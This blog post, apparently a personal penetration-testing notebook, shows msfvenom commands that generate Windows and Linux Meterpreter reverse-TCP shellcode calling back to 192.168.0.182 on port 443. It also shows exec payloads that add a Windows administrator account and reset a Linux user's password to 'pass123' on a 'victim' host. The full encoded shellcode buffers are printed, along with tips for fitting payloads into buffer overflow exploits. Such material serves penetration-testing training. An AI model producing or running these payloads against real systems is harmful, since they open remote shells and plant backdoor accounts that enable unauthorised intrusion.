C0:7E:01:8C:93:EB:D0:FD:E3:CD:74:32:9F:AF:FA:6F:40:FD:8E:1C:05:E3:79:41:6C:77:CD:EF:3E:04:11:12: Generating Meterpreter Payload with Msfvenom

Generate Windows reverse shell to local host 192.168.0.182 on 443 omit bad chars - x00, x0a, x0d, output using python code syntax:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Generate linux reverse shell on localhost 192.168.0.182 port 443 without badchars x00, x0a, x0d, outut using python code syntax:

# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Output:

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of python file: 1834 bytes
buf = ""
buf += "\xba\xf9\x4b\x32\x9e\xda\xd1\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x59\x31\x57\x14\x03\x57\x14\x83\xc7\x04\x1b"
buf += "\xbe\xce\x76\x59\x41\x2f\x87\x3d\xcb\xca\xb6\x7d\xaf"
buf += "\x9f\xe9\x4d\xbb\xf2\x05\x26\xe9\xe6\x9e\x4a\x26\x08"
buf += "\x16\xe0\x10\x27\xa7\x58\x60\x26\x2b\xa2\xb5\x88\x12"
buf += "\x6d\xc8\xc9\x53\x93\x21\x9b\x0c\xd8\x94\x0c\x38\x94"
buf += "\x24\xa6\x72\x39\x2d\x5b\xc2\x38\x1c\xca\x58\x63\xbe"
buf += "\xec\x8d\x18\xf7\xf6\xd2\x24\x41\x8c\x21\xd3\x50\x44"
buf += "\x78\x1c\xfe\xa9\xb4\xef\xfe\xee\x73\x0f\x75\x07\x80"
buf += "\xb2\x8e\xdc\xfa\x68\x1a\xc7\x5d\xfb\xbc\x23\x5f\x28"
buf += "\x5a\xa7\x53\x85\x28\xef\x77\x18\xfc\x9b\x8c\x91\x03"
buf += "\x4c\x05\xe1\x27\x48\x4d\xb2\x46\xc9\x2b\x15\x76\x09"
buf += "\x94\xca\xd2\x41\x39\x1f\x6f\x08\x56\xec\x42\xb3\xa6"
buf += "\x7a\xd4\xc0\x94\x25\x4e\x4f\x95\xae\x48\x88\xda\x85"
buf += "\x2d\x06\x25\x25\x4e\x0e\xe2\x71\x1e\x38\xc3\xf9\xf5"
buf += "\xb8\xec\x2c\x63\xbc\x7a\x0e\xdc\xbe\xcc\xe6\x1f\xbf"
buf += "\x31\x4d\x96\x59\x61\xe1\xf9\xf5\xc2\x51\xba\xa5\xaa"
buf += "\xbb\x35\x99\xcb\xc4\x9f\xb2\x66\x2a\x76\xea\x1e\xd3"
buf += "\xd3\x60\xbe\x1c\xce\x0c\x80\x96\xfb\xf1\x4f\x5e\x89"
buf += "\xe1\xb8\x3f\x71\xfa\x38\xd5\x71\x90\x3c\x7f\x25\x0c"
buf += "\x3f\xa6\x01\x93\xc0\x8d\x11\xd4\x3f\x53\x20\xae\x76"
buf += "\xc1\x0c\xd8\x76\x05\x8d\x18\x21\x4f\x8d\x70\x95\x2b"
buf += "\xde\x65\xda\xe6\x72\x36\x4f\x08\x23\xea\xd8\x60\xc9"
buf += "\xd5\x2f\x2f\x32\x30\x2c\x37\xcc\xc6\x11\x9f\xa5\x38"
buf += "\x16\x1f\x36\x53\x96\x4f\x5e\xa8\xb9\x60\xae\x51\x10"
buf += "\x29\xa6\xd8\xf5\x98\x57\xdc\xdf\x7c\xc6\xdd\xec\xa4"
buf += "\x1f\x50\x12\x5b\x20\x92\x2f\x8a\x19\xe0\x68\x0f\x1e"
buf += "\xeb\x6a\xa5\x6b\x84\x32\x2c\xd6\xc9\xc4\x9b\x15\xf4"
buf += "\x46\x29\xe6\x03\x56\x58\xe3\x48\xd0\xb1\x99\xc1\xb5"
buf += "\xb5\x0e\xe1\x9f"

Based on my experience, the reverse tcp shell is not very reliable, it could be due to a bad connection or firewall blocking, or some mysterious reason for not allowing the connection to establish. If this happens to you, I recommend to generate windows/exec payload. Example:

# msfvenom -a x86 --platform Windows -p windows/exec CMD='net user administrator qwerty /add' -f python

No encoder or badchars specified, outputting raw payload
Payload size: 219 bytes
Final size of python file: 1056 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
buf += "\xff\xd5\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64"
buf += "\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x20\x71"
buf += "\x77\x65\x72\x74\x79\x20\x2f\x61\x64\x64\x00"

Of course, you do this only if you have a RDP protocol running on the victim server. Else, adding an administrator user will be little use.

The same can be done on a linux host too, provided you have other means such as ssh to reach the victim, you can opt for the

# msfvenom -p linux/x86/exec CMD='echo hacker:pass123 | chpasswd' -f python

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
Final size of python file: 334 bytes
buf =  ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1f"
buf += "\x00\x00\x00\x65\x63\x68\x6f\x20\x68\x61\x63\x6b\x65"
buf += "\x72\x3a\x70\x61\x73\x73\x31\x32\x33\x20\x7c\x20\x63"
buf += "\x68\x70\x61\x73\x73\x77\x64\x00\x57\x53\x89\xe1\xcd"
buf += "\x80"

If you noticed, the shellcode for the exec commands are way smaller than the reverse shell.

This is an advantage if you are writing buffer overflows exploits with limited buffer space.

C0:7E:01:8C:93:EB:D0:FD:E3:CD:74:32:9F:AF:FA:6F:40:FD:8E:1C:05:E3:79:41:6C:77:CD:EF:3E:04:11:12

Sunday, June 11, 2017

Generating Meterpreter Payload with Msfvenom

No comments:

Post a Comment

Archive

Labels